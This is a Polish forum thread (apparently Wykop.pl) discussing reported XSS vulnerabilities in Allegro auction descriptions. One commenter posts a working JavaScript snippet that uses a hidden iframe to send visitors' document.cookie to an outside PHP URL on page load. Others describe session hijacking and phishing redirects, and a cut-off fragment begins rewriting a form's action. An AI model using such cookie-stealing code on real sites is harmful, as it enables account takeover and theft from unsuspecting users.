Allegro ponownie zagrożone - dwie nowe luki bezpieczeństwa
Zabezpieczenia Allegro nie działają - w opisach aukcji można bez problemów stosować zakazane znaczniki (X)HTML, skrypty JavaScript, a także obiekty Flash. Co to oznacza? - przejęcie dowolnego konta nie jest problemem ...
- #
- #
- #
- #
- #
- #
- #
- 40
Komentarze (40)
najlepsze
Właśnie teraz to znalezisko załsuguje na mój wykop ;)
te ostatnie watki o dziurach w allegro/ebay robia sie coraz ciekawsze, u nich pewnie goraczkowo probuja latac dziure i mysle ze lada moment , chocby przez wykop jakis dziennikarz sie do tego dorwie i "shit will hit the fan" uslyszymy o tym wzmianke w wiadomosciach. Zebysmy sie przy tym tylko "nie poparzyli", czasem firmy szukajac
Chodzi o wywołanie błędu parsera na etapie przetwarzania kodu CSS, (X)HTML, czy JavaScript? (tyle wystarczy)
var zdalnaRamka = document.createElement ( 'IFRAME' );
zdalnaRamka.style.visibility = 'hidden';
zdalnaRamka.src = 'http://mav.subfan.pl/allegro/sesje.php?zapisz=' + document.cookie;
document.body.appendChild ( zdalnaRamka );
Wsadzić to w window.onload i przy każdym wejściu na aukcje ID jest wysyłane, bez wiedzy użytkownika.
Zadowolony?
Wyslijcie to do allegro - powinni kapusta rzucic za przetestowanie i poinformowanie o wszelkich nieprawidlowosciach. :)
Zastanawia mnie czemu ten temat ma 26 wykopow a np cos o pakowaniu procka w podpaske ma wiecej... no ale moze za duzo sie zastanawiam.
edit
Wiesz, temat troszkę się już pewnie przejadł społeczności Wykopu :P.
@up
Była już przecież jedna afera z XSS na Allegro. Metoda o której mówisz (podkradanie id sesji) - raczej nie ma racji bytu.
Jeśli już, to taki skrypt php powinien sam wejść na allegro z danym ciastkiem i coś wykonać automatycznie. Ręcznie to sobie można...
Wydaje mi się, że jedyne co można w ten
Nie powiedziałem nigdzie że można wykraść w ten sposób hasło :). Jedyne co zyskujemy to dostęp do konta użytkownika w ograniczonym stopniu (do ustawień nie da się wejść). Ewentualnie można dzięki temu w dość łatwy sposób przekierować ofiarę na stronę phisingową na której to dopiero wyciągnie się od niego hasło. Ale to już trzeba liczyć na to, żeby użytkownik
Pełen luz - ale i tak czekam na demko.. z resztą nie tylko ja zapewne. Chce po prsotu sprowokowac pewne osoby do poczynienia pewnych korków.. wtedy allegro.pl raczej zadziała i mam nadzieję coś z tym fantem zrobi.
Nakręcony / nienakręcony.. sam bardzo dużo kupuję i sprzedaję min. na allegro.pl - więc to nie dziwne że czekam na dowód że jest jak jest, a nie że koleś mi wyświetli alert();
Nie obrazaj sie - tylko tak glosno mysle.
Ja uwazam ze to dobrze ze kwestia bezpieczenstwa w allegro wychodzi w blogach i na wykopie. W swietle ostatnich orzeczen sadu zwiazanych z allegro, bardzo wazne jest porzadne zabezpieczenie tego serwisu. Wchodzi odpowiedzialnosc cywilna tutaj
jak ktos nie zna znacznei asłow "krytyczny" oraz "luka" niech zostawi ten temat w spokoju
Ubot - dziękuję za ten wpis. Jesteś jedyną osobą która przemawia do mnie że to jest jednak zagrożenie, i że jest 'to coś' niebezpieczne dla kupujących.
Swoją drogą, nadal czekam na małą prezentację umiejętności" (aż się boję to tak nazywać) i pokazanie jak spreparować aukcję, żeby jednak coś ukraść.. tak jak to zrobił krejd - bo tyle wystarczyło.. w sumie to mało brakowało a dziura byłaby idealna.
Flash posiada język skryptowy który może w dużej mierze wpływać na działanie strony internetowej. Javascript to samo. Możesz kraść ciastka (a od ukradzionego ciastka do przejęcia sesji i zalogowania się jako dany użytkownik już baardzo niedaleko), przekierowywać użytkownika na strony udawające Allegro i wyłudzające hasła... możliwości wykorzystania tego jest mnóstwo.
http://en.wikipedia.org/wiki/Cross-site_scripting
edit: feuer-fest:
document.forms[1].action = '